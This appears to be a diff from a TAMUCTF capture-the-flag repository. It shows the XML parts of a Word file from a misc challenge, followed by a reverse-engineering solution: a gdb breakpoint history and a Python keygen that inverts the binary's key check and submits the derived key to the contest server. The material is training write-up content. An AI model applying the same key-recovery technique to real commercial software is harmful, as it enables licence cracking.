locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="2"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:align>center</wp:align></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>635</wp:posOffset></wp:positionV><wp:extent cx="2857500" cy="1600200"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:wrapSquare wrapText="largest"/><wp:docPr id="1" name="Image1" descr=""></wp:docPr><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:nvPicPr><pic:cNvPr id="1" name="Image1" descr=""></pic:cNvPr><pic:cNvPicPr><a:picLocks noChangeAspect="1" noChangeArrowheads="1"/></pic:cNvPicPr></pic:nvPicPr><pic:blipFill><a:blip r:embed="rId2"></a:blip><a:stretch><a:fillRect/></a:stretch></pic:blipFill><pic:spPr bwMode="auto"><a:xfrm><a:off x="0" y="0"/><a:ext cx="2857500" cy="1600200"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom></pic:spPr></pic:pic></a:graphicData></a:graphic></wp:anchor></w:drawing></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr><w:t>Wait...now I am confused...</w:t></w:r></w:p><w:sectPr><w:type w:val="nextPage"/><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:left="1134" w:right="1134" w:header="0" w:top="1134" w:footer="0" w:bottom="1134" w:gutter="0"/><w:pgNumType w:fmt="decimal"/><w:formProt w:val="false"/><w:textDirection w:val="lrTb"/></w:sectPr></w:body></w:document>

TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/fontTable.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:fonts xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><w:font w:name="Times New Roman"><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="Symbol"><w:charset w:val="02"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="Arial"><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/></w:font><w:font w:name="DejaVu Serif"><w:charset w:val="01"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="DejaVu Sans"><w:charset w:val="01"/><w:family w:val="swiss"/><w:pitch w:val="variable"/></w:font><w:font w:name="Open Sans"><w:altName w:val="Arial"/><w:charset w:val="01"/><w:family w:val="auto"/><w:pitch w:val="default"/></w:font></w:fonts>

TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/settings.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:zoom w:percent="100"/><w:defaultTabStop w:val="709"/></w:settings>

TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/styles.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:styles xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="w14"><w:docDefaults><w:rPrDefault><w:rPr><w:rFonts w:ascii="DejaVu Serif" w:hAnsi="DejaVu Serif" w:eastAsia="Noto Sans" w:cs="Noto Sans"/><w:kern w:val="2"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/></w:rPr></w:rPrDefault><w:pPrDefault><w:pPr><w:widowControl/></w:pPr></w:pPrDefault></w:docDefaults><w:style w:type="paragraph" w:styleId="Normal"><w:name w:val="Normal"/><w:qFormat/><w:pPr><w:widowControl/></w:pPr><w:rPr><w:rFonts w:ascii="DejaVu Serif" w:hAnsi="DejaVu Serif" w:eastAsia="Noto Sans" w:cs="Noto Sans"/><w:color w:val="auto"/><w:kern w:val="2"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="Heading"><w:name w:val="Heading"/><w:basedOn w:val="Normal"/><w:next w:val="TextBody"/><w:qFormat/><w:pPr><w:keepNext w:val="true"/><w:spacing w:before="240" w:after="120"/></w:pPr><w:rPr><w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:eastAsia="Noto Sans" w:cs="Noto Sans"/><w:sz w:val="28"/><w:szCs w:val="28"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="TextBody"><w:name w:val="Body Text"/><w:basedOn w:val="Normal"/><w:pPr><w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/></w:pPr><w:rPr></w:rPr></w:style><w:style w:type="paragraph" w:styleId="List"><w:name w:val="List"/><w:basedOn w:val="TextBody"/><w:pPr></w:pPr><w:rPr></w:rPr></w:style><w:style w:type="paragraph" w:styleId="Caption"><w:name w:val="Caption"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:suppressLineNumbers/><w:spacing w:before="120" w:after="120"/></w:pPr><w:rPr><w:i/><w:iCs/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="Index"><w:name w:val="Index"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:suppressLineNumbers/></w:pPr><w:rPr></w:rPr></w:style></w:styles>

TAMUCTF/Reverse/KeyGenMe/.gdb_history

@@ -0,0 +1,10 @@
+pdisas main
+b *main+200
+r
+pdisas verify_key
+b *verify_key+96
+r
+pdisas verify_key
+b *verify_key+96
+r
+r

TAMUCTF/Reverse/KeyGenMe/bruteforce.py

@@ -0,0 +1,20 @@
+from pwn import *
+v5 = ""
+v2 = ord('H')
+flag = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
+key = "[OIonU2_<__nK<KsK"
+iterator = 0
+while True:
+	for i in flag:
+		if(((ord(i) + 12) * v2 + 17) % 70 + 48) == ord(key[iterator]):
+			v5 += i
+			v2 = ord(key[iterator])
+			iterator += 1
+			break
+	if(len(v5) == len(key)):
+		break
+v5 = v5[:-1]
+print "Key: {}".format(v5)
+r = remote("rev.tamuctf.com", 7223)
+r.sendline(v5)
+r.interactive()